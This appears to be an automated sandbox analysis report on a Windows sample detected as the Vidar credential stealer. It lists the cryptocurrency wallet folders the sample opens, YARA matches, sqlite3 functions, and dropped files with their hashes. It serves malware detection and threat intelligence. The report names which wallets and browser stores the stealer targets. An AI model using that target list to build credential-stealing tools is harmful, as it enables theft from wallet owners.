Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, type: SAMPLE
Source: Yara match	File source: 0.2.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.439a680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.436ce50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.439a680.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.436ce50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2094707680.000000000436C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2092269679.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1698830320.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.000000000439A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2173978549.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2343148482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C480C40 sqlite3_bind_zeroblob,	0_2_6C480C40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C480D60 sqlite3_bind_parameter_name,	0_2_6C480D60
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3A8EA0 sqlite3_clear_bindings,	0_2_6C3A8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE91FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FE91FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE8DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	6_2_1FE8DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE25C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	6_2_1FE25C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE8DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	6_2_1FE8DB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF3D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	6_2_1FF3D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEB5910 sqlite3_mprintf,sqlite3_bind_int64,	6_2_1FEB5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEED610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FEED610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEB55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FEB55B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF3D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	6_2_1FF3D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF314D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	6_2_1FF314D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FECD3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FECD3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEB51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FEB51D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEA9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	6_2_1FEA9090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE40FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	6_2_1FE40FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEF4D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	6_2_1FEF4D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE24820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	6_2_1FE24820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE606E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	6_2_1FE606E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE38680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	6_2_1FE38680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE68550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	6_2_1FE68550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE88200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	6_2_1FE88200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEF37E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FEF37E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FED3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FED3770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE3B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	6_2_1FE3B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE6EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	6_2_1FE6EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE8A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	6_2_1FE8A6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE266C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	6_2_1FE266C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE7E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	6_2_1FE7E200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE8E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FE8E170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE7E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	6_2_1FE7E090

Windows Analysis Report
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1487424
Product:	CloudBasic
Start time:	02:20:07
Start date:	04.08.2024
Sample:	a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	3cd180f72198597215cab492c109f5a0
SHA1:	01ceb31bfcb1f5d6eefffa5bf1c6cb891ca6dd75
SHA256:	5ad0e5d670206288abccd95bb0e3ff1ee9a889b49423cb5160c7c59912991a0d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\BFCAAEHJDBKJ\AAKEGI	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\ProgramData\BFCAAEHJDBKJ\CFCFHJ	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4	6A6BAD38068B0F6F2CADC6464C4FE8F0	4E3B235898D8E900548613DDB6EA59CDA5EB4E68	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
C:\ProgramData\BFCAAEHJDBKJ\CGDHIE	ASCII text, with very long lines (1809), with CRLF line terminators	5D8E5D85E880FB2D153275FCBE9DA6E5	72332A8A92B77A8B1E3AA00893D73FC2704B0D13	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
C:\ProgramData\BFCAAEHJDBKJ\ECFHJK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\BFCAAEHJDBKJ\FHDAEH	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\BFCAAEHJDBKJ\GCAFCA	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\BFCAAEHJDBKJ\IDGDAA	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\BFCAAEHJDBKJ\IJKKKF	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\BFCAAEHJDBKJ\IJKKKF-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\BFCAAEHJDBKJ\JDAKJD	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	C0FDF21AE11A6D1FA1201D502614B622	11724034A1CC915B061316A96E79E9DA6A00ADE8	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
C:\ProgramData\BFCAAEHJDBKJ\JDAKJD-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\EHDHIDAEHC.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4B005E8541F7ED9BD82D80CE58C55C7C	E46BCFEF84B9AE99FE02BFBE1EB0AC464BF28CAC	A8FB80B6E9D920C26922B29171E8301D5D4D9D4F20CD1B07CAD94234B27C61BE
C:\ProgramData\HCBAKJEHDBGH\BGIJDG	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\HCBAKJEHDBGH\IIIEBG	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4	6A6BAD38068B0F6F2CADC6464C4FE8F0	4E3B235898D8E900548613DDB6EA59CDA5EB4E68	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EHDHIDAEHC.exe.log	ASCII text, with CRLF line terminators	93E4C46884CB6EE7CDCC4AACE78CDFAC	29B12D9409BA9AFE4C949F02F7D232233C0B5228	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199747278259[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators	4B2C7B28210655D8661E7933D82E06D9	D6AE0BDA158407E3E74DDB084DC8134E1048DD0A	D44DE6EDB9116F65BFC8EB75318F21E746479CFEB2E74B478F1A1699744C8183
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mine[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4B005E8541F7ED9BD82D80CE58C55C7C	E46BCFEF84B9AE99FE02BFBE1EB0AC464BF28CAC	A8FB80B6E9D920C26922B29171E8301D5D4D9D4F20CD1B07CAD94234B27C61BE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\76561199747278259[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators	8D3B00C4179B4B5F7309D634F910F151	2EEB030A6BE89DAA81C78BA7A324C698B914489A	8737B70CA8D682118B821F7B28FED123FD80AA217B236A75048AA267E08E96D0

Windows Analysis Report a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Malware Threat Intel
Provided by